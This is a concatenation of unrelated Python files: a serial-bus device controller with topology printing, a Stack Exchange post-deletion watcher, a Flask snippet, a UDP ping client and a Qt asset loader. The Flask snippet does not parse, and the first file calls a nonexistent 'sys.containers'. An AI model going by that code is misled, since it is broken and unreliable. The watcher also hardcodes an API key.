# -*- coding: utf-8 -*-
import os
import sys
import json
import time
import logging
import threading
import logging.config
import numpy as np
from datetime import datetime
from collections import defaultdict
from .io import discover_hosts, io_from_host, Ws
from .containers import name2mod
from anytree import AnyNode, RenderTree, DoubleStyle
def run_from_unittest():
return 'unittest' in sys.containers
known_host = {
'ergo': ['/dev/cu.usbserial-DN2AAOVK', '/dev/cu.usbserial-DN2YEFLN'],
'handy': ['/dev/cu.usbserial-DN2X236E'],
'eddy': ['pi-gate.local'],
}
class contList(list):
def __repr__(self):
s = '-------------------------------------------------\n'
s += '{:<20s}{:<20s}{:<5s}\n'.format("Type", "Alias", "ID")
s += '-------------------------------------------------\n'
for elem in self:
s += '{:<20s}{:<20s}{:<5d}\n'.format(elem.type, elem.alias, elem.id)
return s
class nodeList(list):
def __repr__(self):
# Display the topology
s = ''
prefill = ''
prechild = False
for pre, fill, node in RenderTree(self[0], style=DoubleStyle()):
child = []
if (node.parent == None):
branch = " ┃ "
for i,x in enumerate(node.port_table):
child.append(i)
else:
l_port_id = '?'
for i,x in enumerate(node.parent.port_table):
if (x == node.id):
l_port_id = str(i)
r_port_id = node.port_table.index(min(node.port_table))
for i,x in enumerate(node.port_table):
if ((i != r_port_id) and (x != 65535)):
child.append(i)
branch = str(l_port_id) + ">┃" + str(r_port_id) + " "
prefill = (prefill[:len(fill)]) if len(prefill) > len(fill) else prefill
s +='{:<{fillsize}s}'.format(prefill, fillsize=len(fill))
if (prechild == True):
position = -4
s = s[:position] + '║' + s[position+1:]
s += " ┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓\n"
tmpstr = "%s╭node %s" % (branch, node.id)
s += pre + '{:^10s}'.format(tmpstr)
if (node.certified == True):
s += '{:^41s}'.format("Certified") + "┃\n"
else:
s += '{:^41s}'.format("/!\\ Not certified") + "┃\n"
s += fill + " ┃ │ " + '{:<20s}{:<20s}{:<5s}'.format("Type", "Alias", "ID")+ "┃\n"
for y,elem in enumerate(node.containers):
if (y == (len(node.containers)-1)):
s += fill + " ┃ ╰> " + '{:<20s}{:<20s}{:<5d}'.format(elem.type, elem.alias, elem.id)+ "┃\n"
else:
s += fill + " ┃ ├> " + '{:<20s}{:<20s}{:<5d}'.format(elem.type, elem.alias, elem.id) + "┃\n"
if (not child):
s += fill + " >┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛\n"
prechild = False
else:
s += fill + "╔>┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛\n"
prechild = True
prefill = fill
return s
class Device(object):
_heartbeat_timeout = 5 # in sec.
_max_alias_length = 15
_base_log_conf = os.path.join(os.path.dirname(__file__),
'logging_conf.json')
@classmethod
def discover(cls):
hosts = discover_hosts()
possibilities = {
k: [h for h in v if h in hosts]
for k, v in known_host.items()
}
return possibilities
def __init__(self, host,
IO=None,
log_conf=_base_log_conf,
test_mode=False,
*args, **kwargs):
if IO is not None:
self._io = IO(host=host, *args, **kwargs)
else:
self._io = io_from_host(host=host,
*args, **kwargs)
if os.path.exists(log_conf):
with open(log_conf) as f:
config = json.load(f)
logging.config.dictConfig(config)
self.logger = logging.getLogger(__name__)
self.logger.info('Connected to "{}".'.format(host))
self._send_lock = threading.Lock()
self._cmd_lock = threading.Lock()
# We force a first poll to setup our model.
self._setup()
self.logger.info('Device setup.')
self._last_update = time.time()
self._running = True
self._pause = False
# Setup both poll/push synchronization loops.
self._poll_bg = threading.Thread(target=self._poll_and_up)
self._poll_bg.daemon = True
self._poll_bg.start()
self._baudrate = 1000000
def close(self):
self._running = False
self._poll_bg.join()
self._io.close()
@property
def baudrate(self):
return self._baudrate
@baudrate.setter
def baudrate(self, baudrate):
self._send({'baudrate': baudrate})
self._baudrate = baudrate
time.sleep(0.01)
def benchmark(self, target_id, data, repetition):
data = np.array(data, dtype=np.uint8)
self._bench_settings = {'benchmark': {'target': target_id, 'repetitions': repetition, 'data': [len(data)]}}
self._bench_Data = data.tobytes()
self._write( json.dumps(self._bench_settings).encode() + '\r'.encode() + self._bench_Data)
state = self._poll_once()
startTime = time.time()
retry = 0
while ('benchmark' not in state):
state = self._poll_once()
if (time.time()-startTime > 30):
self._write( json.dumps(self._bench_settings).encode() + '\r'.encode() + self._bench_Data)
retry = retry+1
if (retry == 3):
return (0, 100)
startTime = time.time()
#self._pause = False
return (state['benchmark']['data_rate'], state['benchmark']['fail_rate'])
def pause(self):
self._pause = True
time.sleep(1)
def play(self):
self._pause = False
def _setup(self):
self.logger.info('Sending detection signal.')
self._send({'detection': {}})
self.logger.info('Waiting for routing table...')
startTime = time.time()
state = self._poll_once()
while ('routing_table' not in state):
if ('route_table' in state):
self.logger.info("Watch out the Luos revision you are using on your board is too old to work with this revision on pyluos.\n Please consider updating Luos on your boards")
return
state = self._poll_once()
if (time.time()-startTime > 1):
self._send({'detection': {}})
startTime = time.time()
# Create nodes
self._containers = []
self._nodes = []
for i, node in enumerate(state['routing_table']):
if ('node_id' not in node):
self.logger.info("Watch out the Luos revision you are using on your board is too old to work with this revision on pyluos.\n Please consider updating Luos on your boards")
parent_elem = None
# find a parent and create a link
if (min(node["port_table"]) < node["containers"][0]["id"]):
parent_id = min(node["port_table"])
for elem in self._nodes:
if (elem.id == parent_id):
parent_elem = elem
break;
# create the node
self._nodes.append(AnyNode(id=node["node_id"], certified=node["certified"], parent=parent_elem, port_table=node["port_table"]))
filtered_containers = contList([mod for mod in node["containers"]
if 'type' in mod and mod['type'] in name2mod.keys()])
# Create a list of containers in the node
self._nodes[i].containers = [
name2mod[mod['type']](id=mod['id'],
alias=mod['alias'],
device=self)
for mod in filtered_containers
if 'type' in mod and 'id' in mod and 'alias' in mod
]
# Create a list of containers of the entire device
self._containers = self._containers + self._nodes[i].containers
for mod in self._nodes[i].containers:
setattr(self, mod.alias, mod)
self._cmd = defaultdict(lambda: defaultdict(lambda: None))
self._cmd_data = []
self._binary = []
# We push our current state to make sure that
# both our model and the hardware are synced.
self._push_once()
@property
def containers(self):
return contList(self._containers)
@property
def nodes(self):
return nodeList(self._nodes)
# Poll state from hardware.
def _poll_once(self):
self._state = self._io.read()
self._state['timestamp'] = time.time()
return self._state
def _poll_and_up(self):
while self._running:
if not self._pause :
state = self._poll_once()
self._update(state)
self._push_once()
else :
time.sleep(0.1)
# Update our model with the new state.
def _update(self, new_state):
if 'dead_container' in new_state :
#we have lost a container put a flag on this container
alias = new_state['dead_container']
if hasattr(self, alias):
getattr(self, alias)._kill()
if 'assert' in new_state :
# A node assert, print assert informations
if (('node_id' in new_state['assert']) and ('file' in new_state['assert']) and ('line' in new_state['assert'])):
s = "************************* ASSERT *************************\n"
s += "* Node " + str(new_state['assert']['node_id']) + " assert in file " + new_state['assert']['file'] + " line " + str(new_state['assert']['line'])
s += "\n**********************************************************"
print (s)
if 'containers' not in new_state:
return
for alias, mod in new_state['containers'].items():
if hasattr(self, alias):
getattr(self, alias)._update(mod)
self._last_update = time.time()
def update_cmd(self, alias, key, val):
with self._cmd_lock:
self._cmd[alias][key] = val
def update_data(self, alias, key, val, data):
with self._cmd_lock:
self._cmd_data.append({alias: {key: val}})
self._binary.append(data.tobytes())
def _push_once(self):
with self._cmd_lock:
if self._cmd:
self._write( json.dumps({'containers': self._cmd}).encode())
self._cmd = defaultdict(lambda: defaultdict(lambda: None))
for cmd, binary in zip(self._cmd_data, self._binary):
time.sleep(0.01)
self._write( json.dumps({'containers': cmd}).encode() + '\r'.encode() + binary)
self._cmd_data = []
self._binary = []
def _send(self, msg):
with self._send_lock:
self._io.send(msg)
def _write(self, data):
with self._send_lock:
self._io.write(data)
|
deletionwatcher.py
|
# coding=utf-8
import json
import os.path
import requests
import time
import threading
# noinspection PyPackageRequirements
import websocket
# noinspection PyPackageRequirements
from bs4 import BeautifulSoup
from urllib.parse import urlparse
import chatcommunicate
import metasmoke
from globalvars import GlobalVars
import datahandling
from helpers import log
from parsing import fetch_post_id_and_site_from_url, to_protocol_relative
from tasks import Tasks
PICKLE_FILENAME = "deletionIDs.p"
# noinspection PyClassHasNoInit,PyBroadException,PyMethodParameters
class DeletionWatcher:
next_request_time = time.time() - 1
def __init__(self):
DeletionWatcher.update_site_id_list()
self.posts = {}
try:
self.socket = websocket.create_connection("wss://qa.sockets.stackexchange.com/")
except websocket.WebSocketException:
log('error', 'DeletionWatcher failed to create a websocket connection')
return
if datahandling.has_pickle(PICKLE_FILENAME):
pickle_data = datahandling.load_pickle(PICKLE_FILENAME)
for post in DeletionWatcher._check_batch(pickle_data):
self.subscribe(post, pickle=False)
self._save()
threading.Thread(name="deletion watcher", target=self._start, daemon=True).start()
def _start(self):
while True:
msg = self.socket.recv()
if msg:
msg = json.loads(msg)
action = msg["action"]
if action == "hb":
self.socket.send("hb")
else:
data = json.loads(msg["data"])
if data["a"] == "post-deleted":
try:
post_id, _, _, post_url, callbacks = self.posts[action]
if post_id == str(data["aId"] if "aId" in data else data["qId"]):
del self.posts[action]
self.socket.send("-" + action)
Tasks.do(metasmoke.Metasmoke.send_deletion_stats_for_post, post_url, True)
for callback, max_time in callbacks:
if not max_time or time.time() < max_time:
callback()
except KeyError:
pass
def subscribe(self, post_url, callback=None, pickle=True, timeout=None):
post_id, post_site, post_type = fetch_post_id_and_site_from_url(post_url)
if post_site not in GlobalVars.site_id_dict:
log("warning", "unknown site {} when subscribing to {}".format(post_site, post_url))
return
if post_type == "answer":
question_id = datahandling.get_post_site_id_link((post_id, post_site, post_type))
if question_id is None:
return
else:
question_id = post_id
site_id = GlobalVars.site_id_dict[post_site]
action = "{}-question-{}".format(site_id, question_id)
max_time = (time.time() + timeout) if timeout else None
if action not in self.posts:
self.posts[action] = (post_id, post_site, post_type, post_url, [(callback, max_time)] if callback else [])
try:
self.socket.send(action)
except websocket.WebSocketException:
log('error', 'DeletionWatcher failed on sending {}'.format(action))
elif callback:
_, _, _, _, callbacks = self.posts[action]
callbacks.append((callback, max_time))
else:
return
if pickle:
Tasks.do(self._save)
def _save(self):
pickle_output = {}
for post_id, post_site, _, _, _ in self.posts.values():
if post_site not in pickle_output:
pickle_output[post_site] = [post_id]
else:
pickle_output[post_site].append(post_id)
datahandling.dump_pickle(PICKLE_FILENAME, pickle_output)
@staticmethod
def _check_batch(saved):
if time.time() < DeletionWatcher.next_request_time:
time.sleep(DeletionWatcher.next_request_time - time.time())
for site, posts in saved.items():
ids = ";".join(post_id for post_id in posts if not DeletionWatcher._ignore((post_id, site)))
uri = "https://api.stackexchange.com/2.2/posts/{}".format(ids)
params = {
'site': site,
'key': 'IAkbitmze4B8KpacUfLqkw(('
}
res = requests.get(uri, params=params)
json = res.json()
if "items" not in json:
log('warning',
'DeletionWatcher API request received no items in response (code {})'.format(res.status_code))
log('warning', res.text)
return
if 'backoff' in json:
DeletionWatcher.next_request_time = time.time() + json['backoff']
for post in json['items']:
if time.time() - post["creation_date"] < 7200:
yield to_protocol_relative(post["link"]).replace("/q/", "/questions/")
@staticmethod
def _ignore(post_site_id):
return datahandling.is_false_positive(post_site_id) or datahandling.is_ignored_post(post_site_id) or \
datahandling.is_auto_ignored_post(post_site_id)
@staticmethod
def update_site_id_list():
soup = BeautifulSoup(requests.get("https://meta.stackexchange.com/topbar/site-switcher/site-list").text,
"html.parser")
site_id_dict = {}
for site in soup.findAll("a", attrs={"data-id": True}):
site_name = urlparse(site["href"]).netloc
site_id = site["data-id"]
site_id_dict[site_name] = site_id
GlobalVars.site_id_dict = site_id_dict
|
processo_1.py
|
@app.route('/start_task')
def start_task():
def do_work(value):
# do something that takes a long time
import time
time.sleep(value)
thread = Thread(target=do_work, kwargs={'value': request.args.get('value', 20))
thread.start()
return 'started'
@app.route('/start_task')
def start_task():
@app.route("/running_model", methods=['GET', 'POST'])
def running_model():
mdl = jb.load('app/models/mdl.pkl.z')
def raw_data():
if request.method == 'GET':
return render_template('get_data.html')
else:
in_data = Data_Input(data_input=request.form["data_input"])
db.session.add(in_data)
db.session.commit()
df = db.session.execute('SELECT * FROM data_input ORDER BY ID DESC LIMIT 1')
df_pd = pd.DataFrame(df)
title = df_pd.iat[0, 1]
return title
title = raw_data()
result = mdl.predict_proba([title])[0][1]
return render_template("result.html", result=result, title=title)
|
UDPclient.py
|
'''
UDPclient.py
Author: Colleen Kimball
Date: November 2, 2014
Description: This program connects to a server using UDP and pings the server 10 times, collecting RTT information and recording it.
'''
from socket import*
import time
import threading
#this function sends a ping message to the server and records the RTT
def ping(num, rtt):
clientSocket = socket(AF_INET, SOCK_DGRAM)
#set timeout to 1 second
clientSocket.settimeout(1)
#message must be in byte form
message=b'Ping';
start=time.time()
clientSocket.sendto(message, ('localhost',12000))
try:
message,address = clientSocket.recvfrom(2048)
#elapsed is RTT
elapsed=(time.time()-start)
print (str(num)+' Message: '+message+' RTT: '+str(elapsed)+'\n')
except timeout:
#set elapsed to -1 and check for it later so it doesn't skew data
elapsed=-1
print (str(num)+ ' Request Timed Out'+'\n')
clientSocket.close()
rtt.append(elapsed)
def main():
threads=[]
rtt=[]
for i in range(10):
#each thread pings the server
t=threading.Thread(target=ping, args=(i,rtt,))
threads.append(t)
t.start()
for t in threads:
t.join()
avg=0
lost=0
minimum=rtt[0]
for time in rtt:
if time!=-1:
avg+=time
if minimum>time:
minimum=time
else:
lost+=1
avg/=len(rtt)
print ('RTT: Minimum: '+str(minimum)+' Maximum: '+str(max(rtt))+' Average: '+str(avg) + ' Lost: '+str(lost)+'\n')
print("main finished")
main()
|
app.py
|
import os
import sys
import time
import logging
import datetime
import threading
try:
import Queue as queue
except ImportError:
# Python 3+
import queue
from ...vendor.Qt import QtWidgets, QtCore, QtGui
from ... import api, io
from .. import lib
from ...vendor import qtawesome as awesome
log = logging.getLogger(__name__)
module = sys.modules[__name__]
module.window = None
module.root = api.registered_root()
module.project = os.getenv("AVALON_PROJECT")
module.debug = bool(os.getenv("AVALON_DEBUG"))
module.closed = False
# Custom roles
DocumentRole = QtCore.Qt.UserRole + 1
RepresentationsRole = QtCore.Qt.UserRole + 2
LatestRole = QtCore.Qt.UserRole + 3
LocationRole = QtCore.Qt.UserRole + 4
# About to be downloaded
module._downloads = queue.Queue()
# Which downloads are in progress?
module._downloading = dict()
class Window(QtWidgets.QDialog):
"""Asset loader interface"""
download_progressed = QtCore.Signal(str, int)
download_completed = QtCore.Signal()
download_errored = QtCore.Signal(str)
def __init__(self, parent=None):
super(Window, self).__init__(parent)
self.setWindowTitle(
"Asset Loader 2.1 - {root}/{project}".format(
root=api.Session["AVALON_PROJECTS"],
project=api.Session["AVALON_PROJECT"])
)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
body = QtWidgets.QWidget()
sidepanel = QtWidgets.QWidget()
sidepanel.setFixedWidth(270)
footer = QtWidgets.QWidget()
footer.setFixedHeight(20)
container = QtWidgets.QWidget()
assets = QtWidgets.QListWidget()
subsets = QtWidgets.QListWidget()
versions = QtWidgets.QListWidget()
representations = QtWidgets.QListWidget()
# Enable loading many subsets at once
subsets.setSelectionMode(subsets.ExtendedSelection)
layout = QtWidgets.QHBoxLayout(container)
layout.addWidget(assets)
layout.addWidget(subsets)
layout.addWidget(versions)
layout.addWidget(representations)
layout.setContentsMargins(0, 0, 0, 0)
options = QtWidgets.QWidget()
layout = QtWidgets.QGridLayout(options)
layout.setContentsMargins(0, 0, 0, 0)
autoclose_checkbox = QtWidgets.QCheckBox("Auto-close")
layout.addWidget(autoclose_checkbox, 1, 0)
layout = QtWidgets.QHBoxLayout(body)
layout.addWidget(container)
layout.addWidget(sidepanel)
layout.setContentsMargins(0, 0, 0, 0)
load_button = QtWidgets.QPushButton("Load")
refresh_button = QtWidgets.QPushButton(awesome.icon("fa.refresh"), "")
refresh_button.setStyleSheet("""
QPushButton {
max-width: 30px;
font-family: "FontAwesome";
}
""")
offline_slider = QtWidgets.QSlider(QtCore.Qt.Horizontal)
offline_slider.setRange(0, 1)
offline_slider.setFixedHeight(25)
offline_slider.setStyleSheet("""
QSlider {
max-width: 100px;
}
QSlider::groove:horizontal {
border: 1px solid #666;
height: 23px;
background: #777;
margin: 2px 0;
border-radius: 4px;
}
QSlider::groove:horizontal:enabled {
border: 1px solid #222;
height: 23px;
background: qlineargradient(x1:0, y1:0, \
x2:0, y2:1, \
stop:0 #555, \
stop:1 #666);
margin: 2px 0;
border-radius: 4px;
}
QSlider::handle:horizontal {
background: #777;
border: 1px solid #555;
width: 45px;
margin: 1px;
border-radius: 2px;
}
QSlider::handle:horizontal:enabled {
border: 1px solid #333;
background: qlineargradient(x1:0, y1:0, \
x2:1, y2:1, \
stop:0 #aaa \
stop:1 #888);
}
""")
offline_label = QtWidgets.QLabel("Available offline..")
offline_on = QtWidgets.QLabel("On", offline_slider)
offline_off = QtWidgets.QLabel("Off", offline_slider)
offline_on.move(72, 6)
offline_off.move(16, 6)
for toggle in (offline_on, offline_off):
toggle.show()
toggle.setStyleSheet("QLabel { color: black; }")
offline = QtWidgets.QWidget()
layout = QtWidgets.QHBoxLayout(offline)
layout.addWidget(offline_label)
layout.addWidget(offline_slider)
layout.setContentsMargins(0, 0, 0, 0)
message = QtWidgets.QLabel()
message.hide()
side_created_container = QtWidgets.QWidget()
side_created_container.hide()
side_created_header = QtWidgets.QLabel("Created")
side_created_header.setStyleSheet("QLabel { font-weight: bold }")
side_created = QtWidgets.QLabel()
side_created.setWordWrap(True)
layout = QtWidgets.QVBoxLayout(side_created_container)
layout.addWidget(side_created_header)
layout.addWidget(side_created)
layout.setContentsMargins(0, 0, 0, 0)
side_comment_container = QtWidgets.QWidget()
side_comment_container.hide()
side_comment_header = QtWidgets.QLabel("Comment")
side_comment_header.setStyleSheet("QLabel { font-weight: bold }")
side_comment = QtWidgets.QLabel()
side_comment.setWordWrap(True)
layout = QtWidgets.QVBoxLayout(side_comment_container)
layout.addWidget(side_comment_header)
layout.addWidget(side_comment)
layout.setContentsMargins(0, 0, 0, 0)
side_source_container = QtWidgets.QWidget()
side_source_container.hide()
side_source_container.hide()
side_source_header = QtWidgets.QLabel("Source")
side_source_header.setStyleSheet("QLabel { font-weight: bold }")
side_source = QtWidgets.QLabel()
side_source.setWordWrap(True)
side_source.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
side_source.customContextMenuRequested.connect(
self.on_copy_source_menu)
layout = QtWidgets.QVBoxLayout(side_source_container)
layout.addWidget(side_source_header)
layout.addWidget(side_source)
layout.setContentsMargins(0, 0, 0, 0)
side_preset_container = QtWidgets.QWidget()
side_preset_header = QtWidgets.QLabel("Preset")
side_preset_header.setStyleSheet("QLabel { font-weight: bold }")
side_preset = QtWidgets.QComboBox()
if not os.getenv("AVALON_EARLY_ADOPTER"):
side_preset_container.hide()
layout = QtWidgets.QVBoxLayout(side_preset_container)
layout.addWidget(side_preset_header)
layout.addWidget(side_preset)
layout.setContentsMargins(0, 0, 0, 0)
buttons = QtWidgets.QWidget()
layout = QtWidgets.QHBoxLayout(buttons)
layout.addWidget(refresh_button)
layout.addWidget(load_button, 5)
layout.setContentsMargins(0, 0, 0, 0)
layout = QtWidgets.QVBoxLayout(sidepanel)
layout.addWidget(side_comment_container)
layout.addWidget(side_created_container)
layout.addWidget(side_source_container)
layout.addWidget(side_preset_container)
layout.addWidget(QtWidgets.QWidget(), 1)
layout.addWidget(options, 0, QtCore.Qt.AlignBottom)
layout.addWidget(offline)
layout.addWidget(buttons)
layout.setSpacing(10)
layout.setContentsMargins(0, 0, 0, 0)
layout = QtWidgets.QVBoxLayout(footer)
layout.addWidget(message)
layout.setContentsMargins(0, 0, 0, 0)
layout = QtWidgets.QVBoxLayout(self)
layout.addWidget(body)
layout.addWidget(footer)
self.data = {
"button": {
"load": load_button,
"autoclose": autoclose_checkbox,
"offline": offline_slider,
},
"model": {
"assets": assets,
"subsets": subsets,
"versions": versions,
"representations": representations,
},
"label": {
"message": message,
"comment": side_comment,
"commentContainer": side_comment_container,
"created": side_created,
"createdContainer": side_created_container,
"source": side_source,
"sourceContainer": side_source_container,
"preset": side_preset,
"presetContainer": side_preset_container,
},
"state": {
"template": None,
"context": {
"root": None,
"project": None,
"asset": None,
"silo": None,
"subset": None,
"version": None,
"representation": None,
},
}
}
self.download_progressed.connect(self.on_download_progressed)
self.download_completed.connect(self.on_download_completed)
self.download_errored.connect(self.on_download_errored)
offline_slider.valueChanged.connect(self.on_make_available_offline)
load_button.clicked.connect(self.on_load_pressed)
refresh_button.clicked.connect(self.on_refresh_pressed)
assets.currentItemChanged.connect(self.on_assetschanged)
subsets.itemSelectionChanged.connect(self.on_subsetschanged)
versions.currentItemChanged.connect(self.on_versionschanged)
representations.currentItemChanged.connect(
self.on_representationschanged)
# Defaults
self.resize(1100, 600)
load_button.setEnabled(False)
offline_slider.setEnabled(False)
thread = threading.Thread(target=self._download_manager)
thread.daemon = True
thread.start()
def _download_manager(self):
while True:
log.info("Listening for downloads..")
src, dst = module._downloads.get()
# Killswitch
if not any([src, dst]):
break
previous = 0
for progress, error in io.download(src, dst):
if module.closed:
return log.info(
"There were active downloads, they were cancelled"
)
if error:
log.error(error)
self.download_errored.emit(
"ERROR: Could not download %s" % src)
break
# Avoid emitting signals needlessly.
# Progress is sometimes less than one whole percent.
if progress != previous:
previous = progress
self.download_progressed.emit(src, progress)
module._downloading.pop(dst)
if not error:
self.download_completed.emit()
def on_copy_source_to_clipboard(self):
source = self.data["label"]["source"].text()
source = source.format(root=api.registered_root())
clipboard = QtWidgets.QApplication.clipboard()
clipboard.setText(source)
def on_copy_source_menu(self, pos):
pos = QtGui.QCursor.pos()
menu = QtWidgets.QMenu()
action = menu.addAction("Copy to clipboard")
action.triggered.connect(self.on_copy_source_to_clipboard)
menu.move(pos)
menu.exec_()
def on_download_progressed(self, fname, progress):
self.echo("Downloading ({remaining}) {fname}.. {progress}%".format(
remaining=module._downloads.qsize() + 1,
fname=fname,
progress=progress
))
def on_download_completed(self):
self._representationschanged()
self.echo("Done")
def on_download_errored(self, message):
self._representationschanged()
self.echo(message)
def on_make_available_offline(self, state):
if state != 1:
return
if not self.data["button"]["offline"].isEnabled():
return
offline = self.data["button"]["offline"]
models = self.data["model"]
representations_model = models["representations"]
representation_item = representations_model.currentItem()
for representation in representation_item.data(RepresentationsRole):
version = representation["_version"]
# Backwards compatibility, older members did not have this key
locations = version.get("locations", list())
if not locations:
# Support global default, primarily intended during
# the transition from not using locations.
try:
locations = [api.Session["AVALON_LOCATION"]]
except KeyError:
locations = list()
try:
# TODO(marcus): Support multiple locations
location = locations[0]
except IndexError:
offline.setToolTip("Couldn't find where to "
"download this from..")
continue
try:
template = self.data["state"]["template"]
context = self.data["state"]["context"].copy()
context["root"] = location + "/download"
path = template.format(**context)
except Exception as e:
log.error(e)
self.echo("Something went wrong..")
else:
context = self.data["state"]["context"]
src = path
dst = template.format(**context)
module._downloads.put((src, dst))
module._downloading[dst] = True
self.echo("Preparing to download '%s'.." % src)
offline.setToolTip("Download in progress..")
offline.setEnabled(False)
def keyPressEvent(self, event):
"""Delegate keyboard events"""
if event.key() == QtCore.Qt.Key_Return:
return self.on_enter()
def on_enter(self):
self.on_load_pressed()
# -------------------------------
# Delay calling blocking methods
# -------------------------------
def refresh(self):
self.echo("Fetching results..")
lib.schedule(self._refresh, 100, channel="mongo")
def on_assetschanged(self, *args):
self.echo("Fetching results..")
lib.schedule(self._assetschanged, 100, channel="mongo")
def on_subsetschanged(self, *args):
self.echo("Fetching results..")
lib.schedule(self._subsetschanged, 100, channel="mongo")
def on_versionschanged(self, *args):
self.echo("Fetching results..")
lib.schedule(self._versionschanged, 100, channel="mongo")
def on_representationschanged(self, *args):
lib.schedule(self._representationschanged, 100, channel="mongo")
# ------------------------------
def _refresh(self):
"""Load assets from disk and add them to a QListView"""
assets_model = self.data["model"]["assets"]
assets_model.clear()
has = {"children": False}
project = io.find_one({"type": "project"})
preset = self.data["label"]["preset"]
preset.clear()
tasks = sorted(project["config"]["tasks"], key=lambda i: i["name"])
current_index = 0
for index, task in enumerate(tasks):
item = preset.addItem(task["name"])
if task["name"] == os.getenv("AVALON_TASK"):
current_index = index
preset.setCurrentIndex(current_index)
assert project, "This is a bug"
assets = io.find({"type": "asset", "parent": project["_id"]})
for asset in sorted(assets, key=lambda i: i["name"]):
item = QtWidgets.QListWidgetItem(asset["name"])
item.setData(QtCore.Qt.ItemIsEnabled, True)
item.setData(DocumentRole, asset)
assets_model.addItem(item)
has["children"] = True
if not has["children"]:
item = QtWidgets.QListWidgetItem("No assets found")
item.setData(QtCore.Qt.ItemIsEnabled, False)
assets_model.addItem(item)
assets_model.setFocus()
assets_model.setCurrentRow(0)
# Update state
state = self.data["state"]
state["template"] = project["config"]["template"]["publish"]
state["context"]["root"] = api.registered_root()
state["context"]["project"] = project["name"]
self.data["button"]["load"].setEnabled(False)
def _assetschanged(self):
assets_model = self.data["model"]["assets"]
subsets_model = self.data["model"]["subsets"]
subsets_model.clear()
t1 = time.time()
asset_item = assets_model.currentItem()
# The model is empty
if asset_item is None:
return
document = asset_item.data(DocumentRole)
# The model contains an empty item
if document is None:
return
has = {"children": False}
for child in io.find({"type": "subset",
"parent": document["_id"]}):
item = QtWidgets.QListWidgetItem(child["name"])
item.setData(QtCore.Qt.ItemIsEnabled, True)
item.setData(DocumentRole, child)
item.setData(LocationRole, document.get("locations", []))
subsets_model.addItem(item)
has["children"] = True
if not has["children"]:
item = QtWidgets.QListWidgetItem("No subsets found")
item.setData(QtCore.Qt.ItemIsEnabled, False)
subsets_model.addItem(item)
self.data["state"]["context"]["asset"] = document["name"]
self.data["state"]["context"]["silo"] = document["silo"]
self.echo("Duration: %.3fs" % (time.time() - t1))
def _subsetschanged(self):
subsets_model = self.data["model"]["subsets"]
versions_model = self.data["model"]["versions"]
versions_model.clear()
t1 = time.time()
has = {"children": False}
if len(subsets_model.selectedItems()) == 0:
has["children"] = False
elif len(subsets_model.selectedItems()) > 1:
item = QtWidgets.QListWidgetItem("Latest")
item.setData(QtCore.Qt.ItemIsEnabled, True)
item.setData(LatestRole, True)
versions_model.addItem(item)
versions_model.setCurrentItem(item)
has["children"] = True
else:
subset_item = subsets_model.currentItem()
if not subset_item.data(QtCore.Qt.ItemIsEnabled):
return
document = subset_item.data(DocumentRole)
self.data["state"]["context"]["subset"] = document["name"]
for child in io.find({"type": "version",
"parent": document["_id"]},
sort=[("name", -1)]):
item = QtWidgets.QListWidgetItem("v%03d" % child["name"])
item.setData(QtCore.Qt.ItemIsEnabled, True)
item.setData(DocumentRole, child)
versions_model.addItem(item)
has["children"] = True
versions_model.setCurrentRow(0)
if not has["children"]:
item = QtWidgets.QListWidgetItem("No versions found")
item.setData(QtCore.Qt.ItemIsEnabled, False)
versions_model.addItem(item)
self.echo("Duration: %.3fs" % (time.time() - t1))
def _versionschanged(self):
self.data["label"]["commentContainer"].hide()
self.data["label"]["createdContainer"].hide()
self.data["label"]["sourceContainer"].hide()
versions_model = self.data["model"]["versions"]
representations_model = self.data["model"]["representations"]
representations_model.clear()
version_item = versions_model.currentItem()
# Nothing is selected
if version_item is None:
return
if not version_item.data(QtCore.Qt.ItemIsEnabled):
return
representations_by_name = {}
t1 = time.time()
if version_item.data(LatestRole):
# Determine the latest version for each currently selected subset.
subsets = self.data["model"]["subsets"].selectedItems()
subsets = list(item.data(DocumentRole) for item in subsets)
all_versions = io.find({
"type": "version",
"parent": {"$in": [subset["_id"] for subset in subsets]}
})
# What is the latest version per subset?
# (hint: Associated versions share parent)
latest_versions = {
version["parent"]: version
for version in all_versions
}
for version in all_versions:
parent = version["parent"]
highest = latest_versions[parent]["name"]
if version["name"] > highest:
latest_versions[parent] = version
versions_by_id = {
version["_id"]: version
for version in latest_versions.values()
}
representations = io.find({
"type": "representation",
"parent": {"$in": list(versions_by_id.keys())}
})
for representation in representations:
name = representation["name"]
# Embed version, internally
representation["_version"] = versions_by_id[
representation["parent"]
]
# TODO(marcus): These are permanently excluded
# for now, but look towards making this customisable.
if name in ("json", "source"):
continue
if name not in representations_by_name:
representations_by_name[name] = list()
representations_by_name[name].append(representation)
# Prevent accidental load of subsets missing any one representation
for name in representations_by_name.copy():
if len(representations_by_name[name]) != len(subsets):
representations_by_name.pop(name)
self.echo("'%s' missing from some subsets." % name)
else:
version_document = version_item.data(DocumentRole)
self.data["state"]["context"]["version"] = version_document["name"]
representations = io.find({"type": "representation",
"parent": version_document["_id"]})
representations_by_name = {}
for representation in representations:
# Backwards compatibility
if representation["name"] in ("json", "source"):
continue
name = representation["name"]
representation["_version"] = version_document
representations_by_name[name] = [representation]
self.data["label"]["commentContainer"].show()
comment = self.data["label"]["comment"]
comment.setText(
version_document["data"].get("comment") or "No comment"
)
self.data["label"]["sourceContainer"].show()
source = self.data["label"]["source"]
source.setText(version_document["data"].get("source", "No source"))
self.data["label"]["createdContainer"].show()
t = version_document["data"]["time"]
t = datetime.datetime.strptime(t, "%Y%m%dT%H%M%SZ")
t = datetime.datetime.strftime(t, "%b %d %Y %I:%M%p")
created = self.data["label"]["created"]
created.setText(t + " GMT")
has = {"children": False}
for name, documents in representations_by_name.items():
# TODO(marcus): Separate this into something the
# supervisor can configure.
item = QtWidgets.QListWidgetItem({
"ma": "Maya Ascii",
"source": "Original source file",
"abc": "Alembic",
"history": "History",
"curves": "Animation curves",
}.get(name, name)) # Default to using name as-is
item.setData(QtCore.Qt.ItemIsEnabled, True)
item.setData(RepresentationsRole, documents)
representations_model.addItem(item)
has["children"] = True
representations_model.setCurrentRow(0)
if not has["children"]:
item = QtWidgets.QListWidgetItem("No representations found")
item.setData(QtCore.Qt.ItemIsEnabled, False)
representations_model.addItem(item)
self.echo("Duration: %.3fs" % (time.time() - t1))
